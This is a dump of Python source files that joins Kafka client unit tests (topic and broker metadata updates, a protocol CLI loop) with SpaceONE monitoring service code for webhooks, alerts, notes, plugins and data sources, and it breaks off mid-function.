self.client._send_any_broker = MagicMock()
self.client._send_any_broker.return_value = 'metadata_response'
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - (self.client.configuration.metadata_refresh * 2)
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata()
assert self.client._last_full_metadata > fake_last_time
self.client._send_any_broker.assert_called_once()
arg = self.client._send_any_broker.call_args[0][0]
assert isinstance(arg, TopicMetadataV1Request)
assert arg['topics'] is None
self.client._update_from_metadata.assert_called_once_with('metadata_response', delete=True)
def test_maybe_update_full_metadata_nocache(self):
self.client._send_any_broker = MagicMock()
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - 1000
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata(cache=False)
assert self.client._last_full_metadata > fake_last_time
def test_maybe_update_full_metadata_usecache(self):
self.client._send_any_broker = MagicMock()
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - 1000
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata(cache=True)
assert self.client._last_full_metadata == fake_last_time
def test_maybe_update_metadata_for_topics_noupdate(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'])
self.client._update_from_metadata.assert_not_called()
def test_maybe_update_metadata_for_topics_expired(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = 100
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'])
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 1
assert req['topics'][0] == 'topic1'
def test_maybe_update_metadata_for_topics_forced(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'], cache=False)
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 1
assert req['topics'][0] == 'topic1'
def test_maybe_update_metadata_for_topics_nonexistent(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1', 'topic2'])
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 2
assert req['topics'][0] == 'topic1'
assert req['topics'][1] == 'topic2'
def test_update_from_metadata(self):
self.client._update_brokers_from_metadata = MagicMock()
self.client._update_topics_from_metadata = MagicMock()
self.client._update_from_metadata('fake_metadata')
self.client._update_brokers_from_metadata.assert_called_once_with('fake_metadata')
self.client._update_topics_from_metadata.assert_called_once_with('fake_metadata', delete=False)
def test_update_topics_from_metadata_create(self):
# Don't want to test the broker update code here
self.client.cluster.add_broker(Broker('host1.example.com', id=1, port=8031))
self.client.cluster.add_broker(Broker('host2.example.com', id=101, port=8032))
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_topics_from_metadata_missing_broker(self):
# Don't want to test the broker update code here
self.client.cluster.add_broker(Broker('host1.example.com', id=1, port=8031))
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
assert 101 in self.client.cluster.brokers
assert self.client.cluster.brokers[101].endpoint.hostname is None
def test_maybe_delete_topics_not_in_metadata(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
topic = Topic('topic1', 1)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
topic = Topic('topic2', 1)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
self.client._maybe_delete_topics_not_in_metadata(self.metadata_response, delete=True)
assert 'topic2' not in self.client.cluster.topics
assert 'topic1' in self.client.cluster.topics
def test_update_topics_from_metadata_update_replicas(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
broker3 = Broker('host3.example.com', id=304, port=8033)
topic = Topic('topic1', 2)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_broker(broker3)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker3)
topic.partitions[0].add_replica(broker1)
topic.partitions[1].add_replica(broker2)
topic.partitions[1].add_replica(broker1)
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_topics_from_metadata_delete_replicas(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
broker3 = Broker('host3.example.com', id=304, port=8033)
topic = Topic('topic1', 2)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_broker(broker3)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
topic.partitions[0].add_replica(broker3)
topic.partitions[1].add_replica(broker2)
topic.partitions[1].add_replica(broker1)
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata(self):
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata_update_rack(self):
broker1 = Broker('host1.example.com', id=1, port=8031)
broker1.rack = 'wrongrack'
self.client.cluster.add_broker(broker1)
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata_update_host(self):
broker1 = Broker('wronghost.example.com', id=1, port=8031)
self.client.cluster.add_broker(broker1)
broker1.close = MagicMock()
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
broker1.close.assert_called_once()
def test_map_topic_partitions_to_brokers(self):
self.client._update_from_metadata(self.metadata_response)
val = self.client._map_topic_partitions_to_brokers(['topic1'])
assert val == {1: {'topic1': [0]}, 101: {'topic1': [1]}}
def test_map_topic_partitions_to_brokers_nonexistent(self):
self.client._update_from_metadata(self.metadata_response)
self.assertRaises(TopicError, self.client._map_topic_partitions_to_brokers, ['nosuchtopic'])
```
#### File: protocol/requests/test_api_versions_v0.py
```python
import unittest
from tests.tools.protocol.utilities import validate_schema
from kafka.tools.protocol.requests import ArgumentError
from kafka.tools.protocol.requests.api_versions_v0 import ApiVersionsV0Request
class ApiVersionsV0RequestTests(unittest.TestCase):
def test_process_arguments(self):
assert ApiVersionsV0Request.process_arguments([]) == {}
def test_process_arguments_extra(self):
self.assertRaises(ArgumentError, ApiVersionsV0Request.process_arguments, ['foo'])
def test_schema(self):
validate_schema(ApiVersionsV0Request.schema)
```
#### File: tools/protocol/test_main.py
```python
import argparse
import timeout_decorator
import unittest
from mock import patch, MagicMock
from kafka.tools.models.broker import Broker
from kafka.tools.protocol.__main__ import _get_request_classes, _get_request_commands, _print_errors, _parse_command, _cli_loop, main
class TestKlass1:
cmd = "TestKlass"
api_version = 1
class TestKlass2:
cmd = "TestKlass"
api_version = 2
class TestKlassy1:
cmd = "TestKlassy"
api_version = 1
class MainTests(unittest.TestCase):
def setUp(self):
self.broker = Broker('testhost', port=3945)
self.request_classes = {'testklass': {1: TestKlass1, 2: TestKlass2}, 'testklassy': {1: TestKlassy1}}
self.request_cmds = {'testklass': TestKlass2,
'testklassv1': TestKlass1,
'testklassv2': TestKlass2,
'testklassy': TestKlassy1,
'testklassyv1': TestKlassy1}
@patch('kafka.tools.protocol.__main__.get_modules')
def test_get_request_classes(self, mock_modules):
mock_modules.return_value = [TestKlass1, TestKlass2, TestKlassy1]
val = _get_request_classes()
assert val == self.request_classes
def test_get_request_commands(self):
val = _get_request_commands({'testklass': {1: TestKlass1, 2: TestKlass2}, 'testklassy': {1: TestKlassy1}})
print(val)
assert val == self.request_cmds
def test_print_errors(self):
# This just outputs to the console, so just make sure it doesn't fail
_print_errors()
assert True
def test_parse_command_exit(self):
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'exit', [])
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'quit', [])
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'q', [])
@patch('kafka.tools.protocol.__main__.show_help')
def test_parse_command_help(self, mock_help):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'help', [])
mock_help.assert_called_once_with(self.request_classes, self.request_cmds, [])
@patch('kafka.tools.protocol.__main__.show_help')
def test_parse_command_help_pass_args(self, mock_help):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'help', ['foo'])
mock_help.assert_called_once_with(self.request_classes, self.request_cmds, ['foo'])
@patch('kafka.tools.protocol.__main__._print_errors')
def test_parse_command_errors(self, mock_errors):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'errors', [])
mock_errors.assert_called_once_with()
def test_parse_command_unknown(self):
# Should just not raise an error, as it prints out
_parse_command(self.broker, self.request_classes, self.request_cmds, 'unknown_command', [])
assert True
def test_parse_command_request(self):
mock_klass = MagicMock()
mock_broker = MagicMock()
self.request_cmds['testklass'] = mock_klass
self.broker = mock_broker
mock_klass.process_arguments.return_value = 'fake_request_dict'
mock_klass.return_value = 'fake_request'
mock_broker.send.return_value = (8129, 'fake_response')
_parse_command(self.broker, self.request_classes, self.request_cmds, 'testklass', ['someargs'])
mock_klass.process_arguments.assert_called_once_with(['someargs'])
mock_klass.assert_called_once_with('fake_request_dict')
mock_broker.send.assert_called_once_with('fake_request')
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__._parse_command')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_command(self, mock_input, mock_parse, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.side_effect = ['testcommand arg1 arg2', EOFError]
# This will loop twice. First loop should call _parse_command, making sure we pass the args
# Second loop triggers exit
_cli_loop(self.broker)
mock_parse.assert_called_once_with(self.broker, self.request_classes, self.request_cmds, 'testcommand', ['arg1', 'arg2'])
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_exit(self, mock_input, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.return_value = 'exit'
# This will should just exit the loop after 1 run
_cli_loop(self.broker)
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_empty(self, mock_input, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.side_effect = ['', EOFError]
# This should loop twice. The first loop is the test (empty input), the second triggers an exit of the loop
_cli_loop(self.broker)
@patch('kafka.tools.protocol.__main__._cli_loop')
@patch('kafka.tools.protocol.__main__.set_up_arguments')
@patch('kafka.tools.protocol.__main__.Broker')
def test_main(self, mock_broker, mock_args, mock_cli_loop):
mock_args.return_value = argparse.Namespace(broker='testhost', port=9328)
mock_broker_inst = MagicMock()
mock_broker.return_value = mock_broker_inst
rv = main()
assert rv == 0
mock_args.assert_called_once_with()
mock_broker.assert_called_once_with('testhost', port=9328)
mock_broker_inst.connect.assert_called_once_with()
mock_cli_loop.assert_called_once_with(mock_broker_inst)
mock_broker_inst.close.assert_called_once_with()
```
|
{
"source": "jean1042/monitoring",
"score": 2
}
|
#### File: monitoring/info/webhook_info.py
```python
import functools
from spaceone.api.monitoring.v1 import webhook_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.core import utils
from spaceone.core import config
from spaceone.monitoring.model.webhook_model import Webhook
__all__ = ['WebhookInfo', 'WebhooksInfo']
def PluginInfo(vo):
if vo:
info = {
'plugin_id': vo.plugin_id,
'version': vo.version,
'options': change_struct_type(vo.options),
'metadata': change_struct_type(vo.metadata),
'upgrade_mode': vo.upgrade_mode
}
return webhook_pb2.WebhookPluginInfo(**info)
else:
return None
def WebhookInfo(webhook_vo: Webhook, minimal=False):
if webhook_vo.webhook_url:
webhook_url = f'{config.get_global("WEBHOOK_DOMAIN")}{webhook_vo.webhook_url}'
else:
webhook_url = None
info = {
'webhook_id': webhook_vo.webhook_id,
'name': webhook_vo.name,
'state': webhook_vo.state,
'webhook_url': webhook_url,
'project_id': webhook_vo.project_id
}
if not minimal:
info.update({
'access_key': webhook_vo.access_key,
'capability': change_struct_type(webhook_vo.capability),
'plugin_info': PluginInfo(webhook_vo.plugin_info),
'domain_id': webhook_vo.domain_id,
'created_at': utils.datetime_to_iso8601(webhook_vo.created_at)
})
return webhook_pb2.WebhookInfo(**info)
def WebhooksInfo(webhook_vos, total_count, **kwargs):
return webhook_pb2.WebhooksInfo(results=list(
map(functools.partial(WebhookInfo, **kwargs), webhook_vos)), total_count=total_count)
```
#### File: grpc/v1/alert.py
```python
from spaceone.api.monitoring.v1 import alert_pb2, alert_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Alert(BaseAPI, alert_pb2_grpc.AlertServicer):
pb2 = alert_pb2
pb2_grpc = alert_pb2_grpc
def create(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.create(params))
def update(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.update(params))
def update_state(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.update_state(params))
def merge(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.merge(params))
def snooze(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.snooze(params))
def add_responder(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.add_responder(params))
def remove_responder(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.remove_responder(params))
def add_project_dependency(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.add_project_dependency(params))
def remove_project_dependency(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.remove_project_dependency(params))
def delete(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
alert_service.delete(params)
return self.locator.get_info('EmptyInfo')
def get(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.get(params))
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
alert_vos, total_count = alert_service.list(params)
return self.locator.get_info('AlertsInfo',
alert_vos,
total_count,
minimal=self.get_minimal(params))
def stat(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('StatisticsInfo', alert_service.stat(params))
```
#### File: grpc/v1/metric.py
```python
from spaceone.api.monitoring.v1 import metric_pb2, metric_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Metric(BaseAPI, metric_pb2_grpc.MetricServicer):
pb2 = metric_pb2
pb2_grpc = metric_pb2_grpc
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('MetricService', metadata) as metric_service:
return self.locator.get_info('MetricsInfo', metric_service.list(params))
def get_data(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('MetricService', metadata) as metric_service:
return self.locator.get_info('MetricDataInfo', metric_service.get_data(params))
```
#### File: grpc/v1/note.py
```python
from spaceone.api.monitoring.v1 import note_pb2, note_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Note(BaseAPI, note_pb2_grpc.NoteServicer):
pb2 = note_pb2
pb2_grpc = note_pb2_grpc
def create(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.create(params))
def update(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.update(params))
def delete(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
note_service.delete(params)
return self.locator.get_info('EmptyInfo')
def get(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.get(params))
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
note_vos, total_count = note_service.list(params)
return self.locator.get_info('NotesInfo',
note_vos,
total_count,
minimal=self.get_minimal(params))
def stat(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('StatisticsInfo', note_service.stat(params))
```
#### File: rest/v1/event.py
```python
import logging
from fastapi import APIRouter, Request, HTTPException
from spaceone.core.error import *
from spaceone.core.locator import Locator
from spaceone.monitoring.service import EventService
_LOGGER = logging.getLogger(__name__)
router = APIRouter()
@router.post('/webhook/{webhook_id}/{access_key}/events')
async def create_event(webhook_id: str, access_key: str, request: Request):
locator = Locator()
try:
try:
data = await request.json()
except Exception as e:
_LOGGER.debug(f'JSON Parsing Error: {e}')
raise ERROR_UNKNOWN(message='JSON Parsing Error: Request body requires JSON format.')
event_service: EventService = locator.get_service('EventService')
event_service.create({
'webhook_id': webhook_id,
'access_key': access_key,
'data': data or {}
})
return {}
except ERROR_BASE as e:
raise HTTPException(status_code=500, detail=e.message)
except Exception as e:
raise HTTPException(status_code=500, detail=f'Unknown Error: {str(e)}')
```
#### File: monitoring/manager/note_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.monitoring.model.note_model import Note
_LOGGER = logging.getLogger(__name__)
class NoteManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.note_model: Note = self.locator.get_model('Note')
def create_note(self, params):
def _rollback(note_vo):
_LOGGER.info(f'[create_note._rollback] '
f'Delete note : {note_vo.note_id}')
note_vo.delete()
note_vo: Note = self.note_model.create(params)
self.transaction.add_rollback(_rollback, note_vo)
return note_vo
def update_note(self, params):
note_vo: Note = self.get_note(params['note_id'], params['domain_id'])
return self.update_note_by_vo(params, note_vo)
def update_note_by_vo(self, params, note_vo):
def _rollback(old_data):
_LOGGER.info(f'[update_note_by_vo._rollback] Revert Data : '
f'{old_data["note_id"]}')
note_vo.update(old_data)
self.transaction.add_rollback(_rollback, note_vo.to_dict())
return note_vo.update(params)
def delete_note(self, note_id, domain_id):
note_vo: Note = self.get_note(note_id, domain_id)
note_vo.delete()
def get_note(self, note_id, domain_id, only=None):
return self.note_model.get(note_id=note_id, domain_id=domain_id, only=only)
def list_notes(self, query={}):
return self.note_model.query(**query)
def stat_notes(self, query):
return self.note_model.stat(**query)
```
#### File: monitoring/manager/plugin_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.core.connector.space_connector import SpaceConnector
_LOGGER = logging.getLogger(__name__)
class PluginManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.plugin_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='plugin')
def get_plugin_endpoint(self, plugin_info, domain_id):
plugin_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='plugin')
response = plugin_connector.dispatch(
'Plugin.get_plugin_endpoint',
{
'plugin_id': plugin_info['plugin_id'],
'version': plugin_info.get('version'),
'upgrade_mode': plugin_info.get('upgrade_mode', 'AUTO'),
'domain_id': domain_id
}
)
return response['endpoint'], response.get('updated_version')
```
#### File: monitoring/manager/webhook_plugin_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.manager.plugin_manager import PluginManager
from spaceone.monitoring.connector.webhook_plugin_connector import WebhookPluginConnector
_LOGGER = logging.getLogger(__name__)
class WebhookPluginManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wp_connector: WebhookPluginConnector = self.locator.get_connector('WebhookPluginConnector')
def initialize(self, endpoint):
_LOGGER.debug(f'[initialize] webhook plugin endpoint: {endpoint}')
self.wp_connector.initialize(endpoint)
def init_plugin(self, options):
plugin_info = self.wp_connector.init(options)
_LOGGER.debug(f'[plugin_info] {plugin_info}')
plugin_metadata = plugin_info.get('metadata', {})
return plugin_metadata
def verify_plugin(self, options):
self.wp_connector.verify(options)
def parse_event(self, options, data):
return self.wp_connector.parse_event(options, data)
def get_webhook_plugin_endpoint_by_vo(self, webhook_vo: Webhook):
plugin_info = webhook_vo.plugin_info.to_dict()
endpoint, updated_version = self.get_webhook_plugin_endpoint(plugin_info, webhook_vo.domain_id)
if updated_version:
_LOGGER.debug(f'[get_webhook_plugin_endpoint_by_vo] upgrade plugin version: {plugin_info["version"]} -> {updated_version}')
self.upgrade_webhook_plugin_version(webhook_vo, endpoint, updated_version)
return endpoint
def get_webhook_plugin_endpoint(self, plugin_info, domain_id):
plugin_mgr: PluginManager = self.locator.get_manager('PluginManager')
return plugin_mgr.get_plugin_endpoint(plugin_info, domain_id)
def upgrade_webhook_plugin_version(self, webhook_vo: Webhook, endpoint, updated_version):
plugin_info = webhook_vo.plugin_info.to_dict()
self.initialize(endpoint)
plugin_metadata = self.init_plugin(plugin_info.get('options', {}))
plugin_info['version'] = updated_version
plugin_info['metadata'] = plugin_metadata
webhook_vo.update({'plugin_info': plugin_info})
```
#### File: monitoring/service/data_source_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.core import cache
from spaceone.core import config
from spaceone.core import utils
from spaceone.monitoring.error import *
from spaceone.monitoring.manager.repository_manager import RepositoryManager
from spaceone.monitoring.manager.secret_manager import SecretManager
from spaceone.monitoring.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.monitoring.manager.data_source_manager import DataSourceManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class DataSourceService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
self.ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['name', 'plugin_info', 'domain_id'])
def register(self, params):
"""Register data source
Args:
params (dict): {
'name': 'str',
'plugin_info': 'dict',
'tags': 'dict',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
domain_id = params['domain_id']
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_plugin_info(params['plugin_info'])
plugin_info = self._get_plugin(params['plugin_info'], domain_id)
params['capability'] = plugin_info.get('capability', {})
params['provider'] = plugin_info.get('provider')
self._check_plugin_capability(params['capability'])
params['monitoring_type'] = params['capability']['monitoring_type']
# Update metadata
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(params['plugin_info'], domain_id)
if updated_version:
params['plugin_info']['version'] = updated_version
options = params['plugin_info'].get('options', {})
plugin_metadata = self._init_plugin(endpoint, options, params['monitoring_type'])
params['plugin_info']['metadata'] = plugin_metadata
return self.data_source_mgr.register_data_source(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def update(self, params):
"""Update data source
Args:
params (dict): {
'data_source_id': 'str',
'name': 'dict',
'tags': 'dict'
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return self.data_source_mgr.update_data_source_by_vo(params, data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def enable(self, params):
""" Enable data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
return self.data_source_mgr.update_data_source_by_vo({'state': 'ENABLED'},
data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def disable(self, params):
""" Disable data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
return self.data_source_mgr.update_data_source_by_vo({'state': 'DISABLED'},
data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def deregister(self, params):
"""Deregister data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.data_source_mgr.deregister_data_source(params['data_source_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def verify_plugin(self, params):
""" Verify data source plugin
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
endpoint = self.ds_plugin_mgr.get_data_source_plugin_endpoint_by_vo(data_source_vo)
self._verify_plugin(endpoint, data_source_vo.plugin_info.to_dict(), data_source_vo.capability, domain_id)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def update_plugin(self, params):
"""Update data source plugin
Args:
params (dict): {
'data_source_id': 'str',
'version': 'str',
'options': 'dict',
'upgrade_mode': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
version = params.get('version')
options = params.get('options')
upgrade_mode = params.get('upgrade_mode')
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
plugin_info = data_source_vo.plugin_info.to_dict()
if version:
plugin_info['version'] = version
if options:
plugin_info['options'] = options
if upgrade_mode:
plugin_info['upgrade_mode'] = upgrade_mode
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(plugin_info, domain_id)
if updated_version:
plugin_info['version'] = updated_version
plugin_metadata = self._init_plugin(endpoint, plugin_info.get('options', {}), data_source_vo.monitoring_type)
plugin_info['metadata'] = plugin_metadata
params = {
'plugin_info': plugin_info
}
_LOGGER.debug(f'[update_plugin] {plugin_info}')
return self.data_source_mgr.update_data_source_by_vo(params, data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def get(self, params):
""" Get data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
data_source_vo (object)
"""
domain_id = params['domain_id']
self._initialize_data_sources(domain_id)
return self.data_source_mgr.get_data_source(params['data_source_id'], domain_id, params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['data_source_id', 'name', 'state', 'monitoring_type', 'provider', 'domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['data_source_id', 'name', 'provider'])
def list(self, params):
""" List data sources
Args:
params (dict): {
'data_source_id': 'str',
'name': 'str',
'state': 'str',
'monitoring_type': 'str',
'provider': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
data_source_vos (object)
total_count
"""
domain_id = params['domain_id']
query = params.get('query', {})
self._initialize_data_sources(domain_id)
return self.data_source_mgr.list_data_sources(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['data_source_id', 'name', 'provider'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.data_source_mgr.stat_data_sources(query)
@staticmethod
def _check_plugin_capability(capability):
if 'monitoring_type' not in capability:
raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.monitoring_type')
else:
if capability['monitoring_type'] not in ['METRIC', 'LOG']:
